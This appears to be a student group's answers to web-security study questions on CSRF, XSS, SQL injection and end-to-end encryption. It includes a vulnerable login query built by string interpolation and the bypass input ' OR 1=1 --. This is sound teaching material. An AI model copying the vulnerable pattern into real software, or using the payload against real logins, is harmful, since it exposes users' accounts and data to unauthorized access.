- What is a CSRF attack? How does it use HTTP requests? And why do we call it the one-click attack?
- What is an XSS attack? And what is the connection between it and cookies/sessions? And what are the two main categories of XSS?
- What is SQL injection? and what is the attacker’s intention from it?
- Consider the below SQL command, where is the vulnerability? think about some ways an attacker can misuse it:
const { username, password } = req.body
let strQry = `SELECT Count(*) FROM Users WHERE username=${username} AND password=${password}`;
- What does End-to-End encryption means? Share an example of an well-known app using E2EE, how is that app using it?
Room 5
Nada - Mardin - Ibrahim - Shvan - Zainab Al-Najjar
A CSRF (Cross-Site Request Forgery) attack tricks a user's browser into making unintended HTTP requests to a different site. It's often accomplished by luring a user to click on a malicious link or visit a compromised website. The attack exploits the fact that browsers automatically include stored session cookies when making requests to a site, potentially allowing an attacker to perform actions on behalf of the user without their consent. It's called a "one-click attack" because a single click by the user triggers the malicious action.
Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website.
They often target cookies to hijack user sessions. where attackers inject malicious code into websites to steal data or take control.
The two main types: non-persistent (reflected) and persistent (stored).
SQL injection is a code injection technique that exploits vulnerabilities in an application's software layer to execute malicious SQL statements. The attacker's intention with SQL injection is typically to gain unauthorized access to the application's database or to manipulate its data.
how an attacker can misuse it:
SQL Injection: An attacker can manipulate the username or password fields to inject arbitrary SQL code, bypassing authentication or accessing unauthorized data. For example, they could input ' OR 1=1 -- as the password, effectively turning the query into SELECT Count(*) FROM Users WHERE username='someusername' AND password='' OR 1=1 --', which would always return true, effectively bypassing authentication.
Brute Force Attack: Even without exploiting SQL injection directly, an attacker could use this vulnerability to launch a brute force attack by trying different combinations of usernames and passwords until they find a valid pair. This is particularly dangerous if the application doesn't have any protection against multiple failed login attempts.
End-to-end encryption means your messages are scrambled from when you send them until the recipient reads them, so nobody else can snoop. WhatsApp is a popular app using this. When you send a message, it's locked with a key only you and the receiver have, keeping it safe from hackers or even WhatsApp itself.